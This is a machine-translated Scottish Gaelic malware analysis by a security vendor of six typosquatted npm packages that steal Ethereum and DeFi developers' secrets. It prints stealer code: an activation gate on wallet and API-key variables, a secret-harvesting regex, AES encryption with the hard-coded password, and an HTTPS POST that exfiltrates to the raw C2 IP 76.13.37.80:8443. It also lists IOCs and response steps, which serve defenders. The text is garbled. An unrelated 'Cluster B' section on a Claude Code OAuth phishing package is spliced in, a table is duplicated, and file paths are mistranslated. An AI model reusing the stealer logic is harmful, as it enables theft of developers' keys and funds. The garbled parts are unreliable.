Ionnsaigh Typosquatting EVMDeFi npm a’ goid iuchraichean luchd-leasachaidh

Ionnsaigh Typosquatting EVM/DeFi npm a’ goid iuchraichean luchd-leasachaidh

TL; DR

Air 6 Cèitean, 2026, aon fhoillsichear npm, namikazesarada010206, air sia pacaidean droch-rùnach a phutadh a bha ag amas air eag-shiostam luchd-leasachaidh Ethereum, Solidity, agus DeFi.

Na pacaidean, viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, agus web3-utils-core, chleachd iad ainmean reusanta a chaidh a dhealbhadh gus a bhith coltach ri leabharlannan cuideachaidh airson innealan Web3 mòr-chòrdte.

Bha an aon rud anns na sia pacaidean uile telemetry.js faidhle. Bha am faidhle co-ionann ri byte air feadh a’ chnuasaich, le SHA-256:

SHA-256 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1

Cha ruith an malware aig àm an stàlaidh. Chan eil gin ann. preinstall or postinstall dubhan. An àite sin, bidh e ag obair nuair a thèid am pasgan a thoirt a-steach troimhe require().

Tha am mion-fhiosrachadh sin cudromach.

Bidh an implant a’ feitheamh gus an cleachd leasaiche am pasgan. An uairsin bidh e a’ dèanamh cinnteach a bheil an stèisean-obrach coltach ri fìor àrainneachd leasachaidh Ethereum / Solidity. Bidh e a’ coimhead airson iuchraichean Alchemy no Infura, iuchraichean prìobhaideach, mnemonics, iuchraichean luchd-cleachdaidh, no eòlaire Foundry ionadail.

Ma tha an aoigh a’ freagairt, bidh an goideadair a’ tional iuchraichean prìobhaideach SSH, stòran iuchraichean wallet Foundry / Geth / Brownie, .env* faidhlichean, agus caochladairean àrainneachd mothachail. Bidh e a’ crioptachadh a’ phasgan le AES-256-GCM a’ cleachdadh facal-faire cruaidh-chòdaichte agus ga thoirt a-mach gu ceann-uidhe IPv4 C2 amh le dearbhadh TLS air a dhì-cheadachadh.

Dhearbh siostam Rabhaidh Tràth Malware (MEW) Xygeni gu robh na sia pacaidean uile droch-rùnach. Tha pasgan aithisg toirt sìos clàraidh npm ri thighinn.

An Cluster: Sia Pasganan, Aon Fhoillsichear

Cunntas an fhoillsichear namikazesarada010206 bha ceangailte ris an t-seòladh Gmail neo-dhearbhaichte namikazesarada010206@gmail.com.

Nochd an iomairt mar fhoillseachadh aon-latha air 6 Cèitean, 2026. Chaidh na sia pacaidean uile a dhreachachadh mar 1.0.0, cha robh eisimeileachd sam bith aige aig àm ruith, agus cha do chuir e a-mach ach trì faidhlichean:

package.json index.js telemetry.js

Dh’ainmich iad an aon stòr-dàta cuideachd:

https://github.com/harunosakura030303-maker/evmchain-config

Chaidh na trì pacaidean a’ chiad a ghlacadh le sganairean MEW nuair a chaidh am foillseachadh an toiseach. Chaidh bratach èigneachaidh a chur air na trì pacaidean a bha air fhàgail às dèidh ath-sgrùdadh anailisiche air pròifil npm an fhoillsichear. Aon uair ‘s gu robh iad co-ionann ri byte. telemetry.js chaidh a dhearbhadh air feadh a’ chnuasaich, chaidh an dùnadh mar dhroch-rùnach le cunbhalachd.

pasgan tionndadh npm Foillsichte Tiocaid MEW dhùnadh
cridhe-viem 1.0.0 2026-05-06 01:38:44Z #51049 Droch-rùnach
viem-utils-core 1.0.0 2026-05-06 #51050 Droch-rùnach
goireasan cridhe-chruaidh-ad 1.0.0 2026-05-06 #51051 Droch-rùnach
evm-utils 1.0.0 2026-05-06 #51069 Droch-rùnach, le cunbhalachd
goireasan-fùirneis 1.0.0 2026-05-06 #51071 Droch-rùnach, le cunbhalachd
web3-utils-core 1.0.0 2026-05-06 #51070 Droch-rùnach, le cunbhalachd

Tha an ro-innleachd ainmeachaidh sìmplidh ach èifeachdach.

Chan eil na pacaidean seo ag atharrais air ainmean dìreach suas an abhainn. An àite sin, bidh iad a’ cleachdadh iar-leasachain “goireasachd” a tha coltach ri -core, -utils, agus -utils-coreTha sin gan dèanamh coltach ri leabharlannan co-cheangailte a dh’ fhaodadh leasaiche a bhith an dùil fhaicinn faisg air innealan Web3.

Pasgan droch-rùnach Targaid Dligheach
cridhe-viem viem, neach-dèiligidh Ethereum TypeScript mòr-chòrdte
viem-utils-core viem
goireasan cridhe-chruaidh-ad hardhat, àrainneachd leasachaidh Solidity prìomh-shruthach
evm-utils Àite-ainm innealan EVM coitcheann
goireasan-fùirneis fùirneis, slabhraidh innealan Solidity
web3-utils-core web3-utils, luchd-cuideachaidh Web3.js

Seo pàtran a’ “phasgan a bharrachd”: chan e “Is mise am pasgan fìor,” ach “Tha mi coltach ri neach-cuideachaidh reusanta timcheall air a’ phasgan fhìor.”

Do luchd-leasachaidh DeFi a tha a’ gluasad gu luath, tha sin gu leòr airson cunnart a chruthachadh.

Dè thachras nuair a thèid am pasgan a thoirt a-steach

Tha an t-sreath ionnsaigh beag, a dh'aona ghnothach, agus ag amas air àrainneachdan leasachaidh crypto.

Chan eil dubhan stàlaidh ann. An àite sin, tha gach pasgan a’ toirt a-steach index.js a bhios ag às-phortachadh gnìomhachd stub agus an uairsin a’ luchdachadh a’ mhodúl telemeatraidh droch-rùnach.

require('./telemetry').init();

Tha seo a’ ciallachadh gun tèid am malware a ghnìomhachadh air a’ chiad in-mhalairt.

Tha sin feumail a thaobh obrachaidh don ionnsaighear. Bidh mòran sganairean is bogsaichean gainmhich ag amas air giùlan aig àm an stàlaidh. Bidh am pasgan seo a’ feitheamh gus an tèid a chleachdadh le leasaiche, sgriobt togail, sreath deuchainn, no slighe ruith-ùine.

Geata Gnìomhachaidh: A’ losgadh air stèiseanan-obrach luchd-leasachaidh Web3 fìor a-mhàin

Is e am pàirt as cudromaiche den implant an geata gnìomhachaidh.

Bidh an malware a’ sgrùdadh airson caochladairean àrainneachd a lorgar gu cumanta air innealan luchd-leasachaidh Ethereum / Solidity:

const indicators = [   process.env.ALCHEMY_API_KEY,   process.env.INFURA_KEY,   process.env.PRIVATE_KEY,   process.env.MNEMONIC,   process.env.DEPLOYER_KEY, ].filter(Boolean);

Bidh e cuideachd a’ dèanamh cinnteach a bheil coltas gu bheil Foundry air a stàladh:

fs.existsSync(path.join(os.homedir(), '.foundry'))

Mura h-eil ceachtar cumha fìor, bidh an gnìomh a’ tilleadh agus gun dad a dhèanamh.

Tha sin a’ fàgail a’ phacaid nas sàmhaiche ann an àrainneachdan mion-sgrùdaidh coitcheann. Dh’ fhaodadh bogsa-gainmhich às aonais Foundry, iuchraichean Alchemy, iuchraichean Infura, iuchraichean prìobhaideach, no mnemonics in-mhalairt a tha coltach ri gun chron fhaicinn.

Air aoigh co-ionnan, bidh am malware a’ feitheamh 60 gu 90 diogan mus tèid a chruinneachadh:

setTimeout(() => { try { _collect(); } catch {} },           60000 + Math.random() * 30000).unref();

Tha an dàil a’ lughdachadh an dàimh follaiseach eadar in-mhalairt agus às-shìoladh. .unref() Leigidh call leis a’ phròiseas aoigheachd crìochnachadh gu h-àbhaisteach cuideachd ma chaidh am pasgan a thoirt a-steach ann an sgriobt geàrr-ùine.

Chan e giùlan fuaimneach “brùth is greim” a tha seo. ’S e goideadair cuimsichte a th’ ann a chaidh a dhealbhadh gus nach ruith e mura h-eil an àrainneachd leasaiche airidh air goid bhuaithe.

Na bhios an Goideadair a’ cruinneachadh

Cho luath ‘s a thèid an geata gnìomhachaidh seachad, bidh an malware a’ cruinneachadh bho na stòran as cudromaiche ann an leasachadh Web3: iuchraichean prìobhaideach, stòran iuchraichean wallet, teisteanasan cleachdaidh, dìomhaireachdan sgòthan, comharran npm, agus rèiteachadh pròiseict ionadail.

Stòr Dè a thèid a chruinneachadh
pròiseas.cèin Caochladair sam bith a tha a’ freagairt ri /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i
~/.ssh/* Faidhlichean anns a bheil PRIVATE KEY no BEGIN OPENSSH, a’ gabhail a-steach susbaint slàn an fhaidhle
~/.foundry/stòran-iuchrach/* Faidhlichean stòr-iuchrach wallet Foundry
~/.ethereum/stòr-iuchraichean/* Faidhlichean stòr-iuchrach wallet Geth
~/.brownie/cunntasan/* Faidhlichean stòr-iuchrach wallet Brownie
${cwd}/.cèis Susbaint slàn an fhaidhle
${cwd}/.cèilidh.ionadail Susbaint slàn an fhaidhle
${cwd}/.env.production Susbaint slàn an fhaidhle
${cwd}/.env.development Susbaint slàn an fhaidhle
ainm-aoigheachd os.os() Meata-dhàta an aoigh
criopto.randomUUID() Aithnichear an neach-fulang/an t-seisein
Ceann-latha.a-nis() Stampa-ama cruinneachaidh
otheve.beacon.qq.com oth.str.beacon.qq.com h.trace.qq.com

Is iad na comharran ATTA:

ATTA_ID 00400014144 ATTA_TOKEN 6478159937

Cha b’ urrainn dhuinn dearbhadh an e anailitigeachd an gnìomhaiche fhèin a bh’ anns an teilemeatraidh no an e seanal air leth a chaidh airgead a chosnadh. Tha na comharran ATTA mar an ceudna anns an dà shampall a rinn sinn sgrùdadh orra.

Cluster B: heibai

claude.hk Fiosgaich OAuth + Fuadach URL ANTHROPIC_BASE

Is e sampall 1 Giblean am meur as amhaiche, as tràithe den iomairt.

heibai:2.1.88-claude.hk-4 chaidh fhoillseachadh le wuguoqiangvip28, cunntas a chaidh a chruthachadh air 7 Ògmhios 2025. Rinn am pasgan dreach sònraichte dheth fhèin an aghaidh an dligheach 2.1.88 Sgaoileadh antropaigeach.

Chan eil e a’ cur dragh air CA-cert MITM. An àite sin, bidh e a’ laighe ris an neach-cleachdaidh mu cheann-uidhe OAuth.

Am measg nan cuir-ris droch-rùnach a bharrachd air stòr Claude Code a chaidh a leigeil a-mach tha:

Stòr Dè a thèid a chruinneachadh
pròiseas.cèin Caochladair sam bith a tha a’ freagairt ri /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i
~/.ssh/* Faidhlichean anns a bheil PRIVATE KEY no BEGIN OPENSSH, a’ gabhail a-steach susbaint slàn an fhaidhle
~/.foundry/stòran-iuchrach/* Faidhlichean stòr-iuchrach wallet Foundry
~/.ethereum/stòr-iuchraichean/* Faidhlichean stòr-iuchrach wallet Geth
~/.brownie/cunntasan/* Faidhlichean stòr-iuchrach wallet Brownie
${cwd}/.cèis Susbaint slàn an fhaidhle
${cwd}/.cèilidh.ionadail Susbaint slàn an fhaidhle
${cwd}/.env.production Susbaint slàn an fhaidhle
${cwd}/.env.development Susbaint slàn an fhaidhle
ainm-aoigheachd os.os() Meata-dhàta an aoigh
criopto.randomUUID() Aithnichear an neach-fulang/an t-seisein
Ceann-latha.a-nis() Stampa-ama cruinneachaidh

Tha an liosta targaid gu math sònraichte. Chan e goid brabhsair coitcheann no sgrìobadh teisteanasan farsaing a tha seo. Tha e ag amas air luchd-leasachaidh a bhios a’ togail, a’ dèanamh deuchainn air, a’ cleachdadh no ag obrachadh aplacaidean Ethereum.

Tha e gu sònraichte cudromach stòran-iuchrach Foundry, Geth, agus Brownie a thoirt a-steach. Faodaidh na faidhlichean seo ruigsinneachd dhìreach a riochdachadh gu sporanan no dearbh-aithnean cleachdaidh. Ma dh’ fhaodas an ionnsaighear an cur còmhla ri faclan-faire, mnemonics, no dìomhaireachdan àrainneachd, is dòcha gum bi e comasach dhaibh airgead a ghluasad, aithris a dhèanamh air luchd-cleachdaidh, no obrachaidhean chùmhnantan snasail a mhilleadh.

Crioptachadh Roimhe an Dealachadh

Bidh am malware a’ crioptachadh an dàta a chaidh a chruinneachadh mus tèid a chur a-mach.

const key = crypto.createHash('sha256').update(K).digest(); const iv = crypto.randomBytes(12); const cipher = crypto.createCipheriv('aes-256-gcm', key, iv);

Is e am facal-faire cruaidh-chòdaichte:

a]3Fk9$mP2xL7vQ8nR4wJ6yB0tH5cE1d

Tha an luchd mu dheireadh air a phasgadh mar JSON:

{"v":2,"iv":"<base64>","d":"<base64-ciphertext>","t":"<base64-gcm-tag>"}

Chan eil crioptachadh a’ dèanamh an malware nas adhartaiche leis fhèin. Ach, tha e ga dhèanamh nas duilghe sgrùdadh lìonra. Chì neach-dìon a bhios a’ coimhead air egress luchd JSON, ach chan fhaiceadh e na h-iuchraichean, na faidhlichean wallet, no na chaidh a ghoid. .env susbaint às aonais am facal-faire cruaidh-chòdaichte agus loidsig dì-chrioptachaidh.

Eas-shìoladh gu IPv4 C2 amh

Tha an t-slighe às-tharraing air a chòdachadh gu cruaidh:

const req = https.request({   hostname: '76.13.37.80', port: 8443,   path: '/api/v1/telemetry', method: 'POST',   headers: { 'Content-Type': 'application/json', ... },   rejectUnauthorized: false, timeout: 8000, }, () => {});

Cuiridh an malware dàta gu:

https://76.13.37.80:8443/api/v1/telemetry

Tha dà mhion-fhiosrachadh a’ seasamh a-mach.

An toiseach, 's e seòladh IPv4 amh a th' anns a' C2 seach àrainn. Le sin, chan eil feum air clàradh àrainn agus seachnaidh sin cuid de lorgaidhean stèidhichte air àrainn.

San dàrna àite, tha dearbhadh TLS air a dhì-chomasachadh le:

rejectUnauthorized: false

Leigidh sin leis a’ phrògram malware teisteanas sam bith a ghabhail, a’ gabhail a-steach teisteanasan fèin-shoidhnichte. Ann am faclan eile, gheibh an t-ionnsaighear còmhdhail crioptaichte gun fheum air teisteanas poblach dligheach.

Chan eil loidsig ath-dheuchainn ann agus chan eil aoigh cùl-taic ann. Thèid mearachdan a shlugadh gu sàmhach. Cumaidh seo am pasgan sàmhach ma tha an C2 far-loidhne no mura gabh a ruigsinn.

Carson a tha an iomairt seo cudromach

Bidh a’ mhòr-chuid de phasganan npm droch-rùnach a tha ag amas air luchd-leasachaidh a’ sireadh teisteanasan farsaing: comharran npm, iuchraichean AWS, comharran GitHub, no .npmrc faidhlichean.

Tha an iomairt seo a’ caolachadh an targaid.

Bidh e a’ coimhead airson comharran gu bheil an inneal le leasaiche Ethereum no Solidity. An uairsin bidh e a’ tarraing dìreach na so-mhaoin a tha cudromach san àrainneachd sin: stòran iuchair wallet, iuchraichean prìobhaideach, mnemonics, iuchraichean luchd-cleachdaidh, .env faidhlichean, agus iuchraichean SSH.

Tha sin a’ dèanamh an iomairt nas cunnartach do sgiobaidhean Web3 na goideadair npm coitcheann.

Dh’fhaodadh galar soirbheachail nochdadh:

  • Spòran-cleachdaidh
  • Iuchraichean rianachd cùmhnant snasail
  • Iuchraichean solaraiche RPC
  • Teisteanasan cleachdaidh sgòthan
  • comharran foillseachaidh npm
  • Cothrom SSH air bun-structar luchd-leasachaidh no togail
  • Dìomhaireachdan pròiseict air an stòradh ann an .env faidhlichean
  • Stòran iuchair wallet airson Foundry, Geth, no Brownie

Tha ainmean nam pasganan cuideachd a’ sealltainn innleadaireachd shòisealta shoilleir. Bidh iad ag amas air eag-shiostam luchd-leasachaidh Web3 tro ainmean innealan eòlach: viem, hardhat, foundry, evm, agus web3.

Chan fheum an cleasaiche co-rèiteachadh a dhèanamh air na pròiseactan fìor. Chan fheum iad ach leasaiche gus pasgan companach reusanta a stàladh.

Comharran Co-rèiteachaidh agus Lorgaidh

Pacaidean agus Foillsichear
Field luach
foillsichear npm namikazesarada010206
Post-d an fhoillsichear namikazesarada010206@gmail.com
post-d air a dhearbhadh Chan eil
SCM dearbhadh Chan eil
Sgòr cliù 1.0
pasgain viem-core, viem-utils-core, hardhat-core-utils, evm-utils, fùirneis-innealan, web3-utils-core
dreachan Gach 1.0.0
Stòr-tasgaidh stòrais https://github.com/harunosakura030303-maker/evmchain-config
Dearbhaichte droch-rùnach Na sia pacaidean uile
lìonra
Type luach
Ceann-uidhe C2 https://76.13.37.80:8443/api/v1/telemetry
C2 IP 76.13.37.80
Port C2 8443/tc
Giùlan TLS diùltadhGun chead: meallta
Sgeama luchd-pàighidh {"v":2,"iv": "d": "t": }
Faidhlichean agus Hashes
Type luach
telemetry.js SHA-256 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1
Cruth a’ phacaid pasgan.json, clàr-amais.js, telemetrachd.js
Àireamh fhaidhlichean 3
Meud iomlan tuairmseach 3.4 KB

Comharran Gnìomhachaidh

Bidh an malware a’ sgrùdadh airson na caochladairean àrainneachdail seo:

ALCHEMY_API_KEY INFURA_KEY PRIVATE_KEY MNEMONIC DEPLOYER_KEY

Bidh e cuideachd a’ dèanamh sgrùdadh airson:

~/.foundry/

Slighean Aoigheachd Targaidte

~/.ssh/* ~/.foundry/keystores/* ~/.ethereum/keystore/* ~/.brownie/accounts/* ${cwd}/.env ${cwd}/.env.local ${cwd}/.env.production ${cwd}/.env.development

Cruinneachadh Regex

/TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i

Notaichean Lorgaidh

Bidh grunn riaghailtean a’ glacadh an iomairt seo gun fheum air làn sgrùdadh giùlain.

An toiseach, sgan faidhlichean glasaidh airson na sia ainmean pacaid droch-rùnach:

viem-core viem-utils-core hardhat-core-utils evm-utils foundry-utils web3-utils-core

Maidse sam bith ann package-lock.json, yarn.lock, pnpm-lock.yaml, no node_modules Bu chòir eachdraidh a làimhseachadh mar thachartas cudromach.

San dàrna àite, cùm sùil air pròiseasan Node.js a’ leughadh slighean stòr-iuchrach wallet:

~/.foundry/keystores/ ~/.ethereum/keystore/ ~/.brownie/accounts/

Is ann ainneamh a bhios seo na ghiùlan dligheach airson pasgan a chaidh a thoirt a-steach mar eisimeileachd cuideachaidh. Tha e gu sònraichte amharasach nuair a bhios gnìomhachd lìonra a-muigh ga leantainn.

San treas àite, cuir bacadh air no cuir rabhadh air ceanglaichean HTTPS gu:

76.13.37.80:8443

Gu h-àraidh nuair a tha an t-slighe iarrtas:

/api/v1/telemetry

San ceathramh àite, coimhead airson pacaidean npm a tha a’ cothlamadh nan feartan seo:

  • Foillsichear ùr no le cliù ìosal
  • Cunntas Gmail gun dearbhadh
  • Ainm pacaid ri taobh Web3
  • Gun eachdraidh tasglann brìoghmhor
  • Cruth pacaid bheag
  • index.js a luchdaicheas faidhle telemetry no cuideachaidh
  • Gun eisimeileachdan ruith-ùine
  • Cruinneachadh caochladairean àrainneachd mothachail
  • Ruigsinneachd stòr-iuchrach wallet

Tha am pàtran seo nas fheumail na aon IOC oir is dòcha gun atharraich an ath phacaid an seòladh IP ach gun cùm e an aon loidsig targaid.

Liosta-sgrùdaidh Freagairt Co-rèiteachaidh

Ma chleachd leasaiche aon de na sia pacaidean agus ma bha an àrainneachd aca a’ freagairt ris a’ gheata gnìomhachaidh, làimhsich an stèisean-obrach mar gum biodh e air a mhilleadh.

Tha sin a’ gabhail a-steach innealan le Foundry air a stàladh, iuchraichean Alchemy no Infura san àrainneachd, iuchraichean prìobhaideach, mnemonics, no iuchraichean an neach-cleachdaidh.

Freagairt a thathar a’ moladh:

  • Dì-cheangail an aoigh bhon lìonra.
  • Glèidh node_modules, faidhlichean glasaidh, eachdraidh shligean, agus logaichean buntainneach airson sgrùdaidhean foireansach.
  • Cuairtich gach paidhir iuchraichean SSH fo ~/.ssh/.
  • Cuairtich iuchraichean wallet airson gach stòr-iuchraichean fo ~/.foundry, ~/.ethereum, agus ~/.brownie.
  • Gluais airgead gu sporanan ùra.
  • Cuairtich gach dìomhaireachd a tha air a stòradh ann .env* faidhlichean ann an stòran-dàta anns an robh an leasaiche ag obair.
  • Cuairtich dìomhaireachdan na h-àrainneachd a tha a’ freagairt ris an regex cruinneachaidh, a’ gabhail a-steach iuchraichean AWS, comharran npm, comharran cleachdaidh, iuchraichean API, iuchraichean prìobhaideach, sìol, agus mnemonics.
  • Dèan sgrùdadh air gnìomhachd an sgòth, npm, GitHub, solaraiche RPC, agus blockchain bho chaidh am pasgan a stàladh an toiseach.
  • Dèan ath-dhealbh den stèisean-obrach mus cleachd thu e a-rithist.

Na bu chòir do luchd-dìon a thoirt leotha

Tha an iomairt seo a’ sealltainn mar a tha npm typosquatting ag atharrachadh timcheall air eag-shiostaman luchd-leasachaidh àrd-luach.

Cha robh feum aig an actair air buanseasmhachd. Cha robh feum aca air doilleireachd. Cha robh feum aca eadhon air cur an gnìomh aig àm an stàlaidh.

An àite sin, bha iad an urra ri trì rudan:

  • Ainmean pacaid Web3 a tha coltach
  • Gnìomhachadh a-mhàin air fìor innealan leasachaidh crypto
  • Goid dìreach nam faidhlichean agus na dìomhaireachdan a tha cudromach do luchd-leasachaidh Ethereum

Tha sin a’ ciallachadh gu bheil an iomairt furasta a chall ann an sganadh farsaing agus cunnartach nuair a thuiteas i san àrainneachd cheart.

Do sgiobaidhean Web3, tha an leasan soilleir: dèilig ri ainmean eisimeileachd mar phàirt den mhodail bagairt agad. Faodaidh pasgan a tha coltach ri neach-cuideachaidh gun chron a bhith fhathast mar an t-slighe as giorra gu milleadh wallet.

Chaidh aithris don chlàr npm. Cuiridh sinn am post seo ris nuair a thèid cunntas agus pacaidean an fhoillsichear a thoirt air falbh.

innealan-sca-bathar-bog-innealan-anailis-co-dhèanamh
Thoir prìomhachas do chunnartan bathar-bog, dèan cinnteach gu bheil iad air an rèiteachadh, agus dèan cinnteach gu bheil iad tèarainte
Faigh do Chunntas an-asgaidh.
Chan eil feum air cairt creideas.

Dèan cinnteach à leasachadh is lìbhrigeadh do bhathar-bog

le Sreath Thoraidhean Xygeni